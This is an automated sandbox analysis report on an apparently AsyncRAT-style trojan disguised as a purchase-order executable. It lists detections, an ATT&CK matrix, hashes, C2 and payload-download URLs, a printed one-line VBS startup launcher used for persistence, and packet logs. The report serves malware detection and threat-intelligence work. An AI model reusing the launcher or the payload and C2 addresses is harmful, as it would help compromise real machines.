                  Email Addresses | DNS Server | Domain Accounts | At | 1 DLL Side-Loading | 1 DLL Side-Loading | 341 Virtualization/Sandbox Evasion | Security Account Manager | 341 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
                  Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 212 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                  Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 2 Obfuscated Files or Information | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | 113 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                  Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 213 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
[Behavior graph] Behavior Graph ID: 1586913, Sample: PO-12202432_ACD_Group.pif.exe, Startdate: 09/01/2025, Architecture: WINDOWS, Score: 100
• PO-12202432_ACD_Group.pif.exe: started InstallUtil.exe; DNS/IP: chirreeirl.com 209.58.149.225, 443, 49751, 49753 (LEASEWEB-USA-DAL-10US, United States); dropped C:\Users\user\...\IsNestedFamANDAssem.exe (PE32), C:\Users\user\...\IsNestedFamANDAssem.vbs (ASCII), IsNestedFamANDAssem.exe:Zone.Identifier (ASCII)
• InstallUtil.exe: DNS/IP: pureeratee.duckdns.org 193.187.91.218, 49752, 50787 (OBE-EUROPEObenetworkEuropeSE, Sweden)
• wscript.exe: started IsNestedFamANDAssem.exe, which started InstallUtil.exe

Source | Detection | Scanner | Label | Link
PO-12202432_ACD_Group.pif.exe | 68% | ReversingLabs | Win32.Trojan.Leonem |
PO-12202432_ACD_Group.pif.exe | 100% | Avira | TR/AVI.MalwareX.nhsfu |
PO-12202432_ACD_Group.pif.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe | 100% | Avira | TR/AVI.MalwareX.nhsfu |
C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe | 68% | ReversingLabs | Win32.Trojan.Leonem |

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label | Link
https://www.chirreeirl.com | 0% | Avira URL Cloud | safe |
https://www.chirreeirl.com/wp-panel/uploads/Vwibbc.mp4 | 0% | Avira URL Cloud | safe |
https://www.chirreeirl.com/ | 0% | Avira URL Cloud | safe |

Name | IP | Active | Malicious | Antivirus Detection | Reputation
pureeratee.duckdns.org | 193.187.91.218 | true | true | | unknown
chirreeirl.com | 209.58.149.225 | true | false | | unknown
www.chirreeirl.com | unknown | unknown | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://www.chirreeirl.com/wp-panel/uploads/Vwibbc.mp4 | false | Avira URL Cloud: safe | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
https://github.com/mgravell/protobuf-neti | PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69507142380.0000000006640000.00000004.08000000.00040000.00000000.sdmp | false | | high
https://stackoverflow.com/q/14436606/23354 | PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69484926490.00000000029C2000.00000004.00000800.00020000.00000000.sdmp, PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69507142380.0000000006640000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.71821802467.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, IsNestedFamANDAssem.exe, 00000004.00000002.69699448945.00000000031F2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.69853746886.0000000002701000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/mgravell/protobuf-netJ | PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69507142380.0000000006640000.00000004.08000000.00040000.00000000.sdmp | false | | high
https://github.com/DFfe9ewf/test3/raw/refs/heads/main/WebDriver.dll | InstallUtil.exe, 00000002.00000002.71821802467.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.69853746886.0000000002701000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://stackoverflow.com/q/2152978/23354rCannot | InstallUtil.exe, 00000002.00000002.71821802467.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.69853746886.0000000002701000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://stackoverflow.com/q/11564914/23354; | PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69507142380.0000000006640000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.71821802467.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.69853746886.0000000002701000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://stackoverflow.com/q/2152978/23354 | PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69507142380.0000000006640000.00000004.08000000.00040000.00000000.sdmp | false | | high
https://github.com/DFfe9ewf/test3/raw/refs/heads/main/chromedriver.exe | InstallUtil.exe, 00000002.00000002.71821802467.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.69853746886.0000000002701000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/DFfe9ewf/test3/raw/refs/heads/main/msedgedriver.exe | InstallUtil.exe, 00000002.00000002.71821802467.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.69853746886.0000000002701000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/mgravell/protobuf-net | PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69507142380.0000000006640000.00000004.08000000.00040000.00000000.sdmp | false | | high
http://www.quovadis.bm0 | PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69503990803.0000000006040000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.71832326017.0000000005970000.00000004.00000020.00020000.00000000.sdmp, IsNestedFamANDAssem.exe, 00000004.00000002.69723796661.00000000068C0000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.chirreeirl.com | PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69484926490.0000000002921000.00000004.00000800.00020000.00000000.sdmp, IsNestedFamANDAssem.exe, 00000004.00000002.69699448945.0000000003151000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ocsp.quovadisoffshore.com0 | PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69503990803.0000000006040000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.71832326017.0000000005970000.00000004.00000020.00020000.00000000.sdmp, IsNestedFamANDAssem.exe, 00000004.00000002.69723796661.00000000068C0000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69484926490.0000000002921000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.71821802467.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, IsNestedFamANDAssem.exe, 00000004.00000002.69699448945.0000000003151000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.chirreeirl.com/ | PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69483700366.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
209.58.149.225 | chirreeirl.com | United States | | 394380 | LEASEWEB-USA-DAL-10US | false
193.187.91.218 | pureeratee.duckdns.org | Sweden | | 197595 | OBE-EUROPEObenetworkEuropeSE | true

                                                  Joe Sandbox version:42.0.0 Malachite
                                                  Analysis ID:1586913
                                                  Start date and time:2025-01-09 19:05:31 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 10m 36s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                  Run name:Suspected VM Detection
                                                  Number of analysed new started processes analysed:6
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Sample name:PO-12202432_ACD_Group.pif.exe
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.expl.evad.winEXE@8/4@2/2
                                                  EGA Information:
                                                  • Successful, ratio: 50%
                                                  HCA Information:
                                                  • Successful, ratio: 89%
                                                  • Number of executed functions: 468
                                                  • Number of non-executed functions: 34
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                  • Exclude process from analysis (whitelisted): dllhost.exe
                                                  • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                  • Execution Graph export aborted for target InstallUtil.exe, PID 6000 because it is empty
                                                  • Execution Graph export aborted for target InstallUtil.exe, PID 6340 because it is empty
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                  • VT rate limit hit for: PO-12202432_ACD_Group.pif.exe

Time | Type | Description
13:07:37 | API Interceptor | 16x Sleep call for process: PO-12202432_ACD_Group.pif.exe modified
13:07:57 | API Interceptor | 14499782x Sleep call for process: InstallUtil.exe modified
13:07:59 | API Interceptor | 14x Sleep call for process: IsNestedFamANDAssem.exe modified
19:07:50 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs

                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1183
                                                                Entropy (8bit):5.356029462517172
                                                                Encrypted:false
                                                                SSDEEP:24:ML9E4K1BIKDE4KhKMaKhRAE4KzDAfE4KnKIE4oKnKo9E4KhROtHM:MxHK1BIYHKh6oRAHKzMfHKntHoAlHKh/
                                                                MD5:54AC8B422C14A1D319806B83D3E54233
                                                                SHA1:A030D676C9697AFAE3D4499EC142700FE059AB38
                                                                SHA-256:A2A67CCAE5BBACFA68E3403DC2F3177F3DA6CD234A0821DA39CB3387C1C5FDFE
                                                                SHA-512:59F41ED9281AED912B0AA719913D351DEC57AF968F490C99D668E033EB2C936B4C813C59C94EB003AE59DB06EEBCCCC8E5426AAE58D003C04B443EC2159B6643
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\827465c25133ff582ff7ddaf85635407\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\374ae62ebbde44ef97c7e898f1fdb21b\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\10879c5bddb2dd2399e2098d5ca5c9d1\System.Xml.ni.dll",0..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\b863adc9d550931e279ac7e2ee517d1f\System.Configuration.ni.dll",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=n
                                                                Process:C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):27136
                                                                Entropy (8bit):5.516192210902329
                                                                Encrypted:false
                                                                SSDEEP:384:RTo2ZKanPS/jKkWS+72x+oVQ4ZHiYzfmP4a0fIMbRodF5YHqZlEOmWVYvZ:omsz+72x+qQUicfFfdE0AiB
                                                                MD5:95BEC6594E293A42F4ABB049EA7E81DB
                                                                SHA1:36ECE8150F0619FC81BBF92BD840CAD252BF1AEA
                                                                SHA-256:43057C1F8E32C29342CFB790C692C291F33526F9BE1380758B9C7C42344A5948
                                                                SHA-512:51989412F10AA223E52190587EBF20D0EF447C96D75B9C1D6592DB9C1814D9F56C213CF4B2AD1543D5FC5F20A775D0DB55820D5725A88EF983C454020E6A68C4
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 68%
                                                                Reputation:low
                                                                Process:C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:modified
                                                                Size (bytes):26
                                                                Entropy (8bit):3.95006375643621
                                                                Encrypted:false
                                                                SSDEEP:3:ggPYV:rPYV
                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                Malicious:true
                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                Process:C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):95
                                                                Entropy (8bit):4.8084617674117025
                                                                Encrypted:false
                                                                SSDEEP:3:FER/n0eFHHoONtkEaKC5fmVhRt0dinn:FER/lFHICNaZ5fmV3t0din
                                                                MD5:6587E543BBDCFEDAD9DE9CB958598347
                                                                SHA1:6F8B87648A6E3182269EDCC4E8C5F8BB1EB5009C
                                                                SHA-256:BF35E0814D67B0F0B571D888330ED7E11DFE64C211BB1EC1A35F110C52B7E563
                                                                SHA-512:4AE50068A003B954D831527B493C0E5CB0FC6A2387BD8C60D27CDA05C4949347AB244982121CEF058E86516D9817A6A9CDA895DF29A42CDAAF1698A95F5A2408
                                                                Malicious:true
                                                                Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe"""
                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Entropy (8bit):5.516192210902329
                                                                TrID:
                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                File name:PO-12202432_ACD_Group.pif.exe
                                                                File size:27'136 bytes
                                                                MD5:95bec6594e293a42f4abb049ea7e81db
                                                                SHA1:36ece8150f0619fc81bbf92bd840cad252bf1aea
                                                                SHA256:43057c1f8e32c29342cfb790c692c291f33526f9be1380758b9c7c42344a5948
                                                                SHA512:51989412f10aa223e52190587ebf20d0ef447c96d75b9c1d6592db9c1814d9f56c213cf4b2ad1543d5fc5f20a775d0db55820d5725a88ef983c454020e6a68c4
                                                                SSDEEP:384:RTo2ZKanPS/jKkWS+72x+oVQ4ZHiYzfmP4a0fIMbRodF5YHqZlEOmWVYvZ:omsz+72x+qQUicfFfdE0AiB
                                                                TLSH:C7C26B6CC3D81A62CBFE5F3A98F55340877AFB0EB99BE75F088435CA5E027A4445071A
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O.xg.................`..........2~... ........@.. ....................................`................................
                                                                Icon Hash:90cececece8e8eb0
                                                                Entrypoint:0x407e32
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x6778044F [Fri Jan 3 15:37:51 2025 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                Instruction
                                                                jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7de8 | 0x4a | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x8000 | 0x57e | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x5e38 | 0x6000 | 209c320cd40e1081977ee08e6bed8a75 | False | 0.507568359375 | data | 5.6830361681553905 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x8000 | 0x57e | 0x600 | ba933dc11f614b448d59b20e0df9569f | False | 0.419921875 | data | 4.046378908802311 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xa000 | 0xc | 0x200 | f8fc6b4d2a42baf72ffb6180102cd58f | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x805c | 0x2fc | data | | | 0.43717277486910994
RT_MANIFEST | 0x8394 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-09T19:07:58.009916+0100 | 2035595 | ET MALWARE Generic AsyncRAT Style SSL Cert | 1 | 193.187.91.218 | 50787 | 192.168.11.20 | 49752 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                Jan 9, 2025 19:07:40.058928013 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.059385061 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.059536934 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.059678078 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.060045958 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.060276985 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.060350895 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.060899019 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.061135054 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.061635017 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.061978102 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.061978102 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.062299967 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.062549114 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.063095093 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.063344002 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.063792944 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.063993931 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.064090967 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.090693951 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.090998888 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.091284990 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.091438055 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.091674089 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.092197895 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.092438936 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.092765093 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.093530893 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.093530893 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.134512901 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.134753942 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.135404110 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.135612011 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.135721922 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.188787937 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.188991070 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.189034939 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.189519882 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.189778090 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.190236092 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.190563917 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.191018105 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.191174030 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.191330910 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.191696882 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.191930056 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.192015886 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.192466021 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.192630053 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.192630053 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.192838907 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.193236113 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.193504095 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.193897009 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.194138050 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.194680929 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.194859028 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.195008039 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.195367098 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.195529938 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.195619106 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.196269035 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.196506023 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.196583986 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.196826935 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.197007895 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.197062969 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.197546005 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.197715998 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.197715998 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.197813988 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.198432922 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.198677063 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.199115038 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.199414968 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.199791908 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.199961901 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.200218916 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.200475931 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.200650930 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.200731039 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.201261044 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.201538086 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.201925993 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.202151060 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.202630997 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.202775955 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.202893972 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.203444958 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.203687906 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.204138041 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.204375029 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.204463959 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.204875946 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.205091000 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.205539942 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.205703974 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.205845118 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.206398964 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.206705093 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.207035065 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.207324982 CET49751443192.168.11.20209.58.149.225
                                                                Jan 9, 2025 19:07:40.207804918 CET44349751209.58.149.225192.168.11.20
                                                                Jan 9, 2025 19:07:40.208002090 CET49751443192.168.11.20209.58.149.225
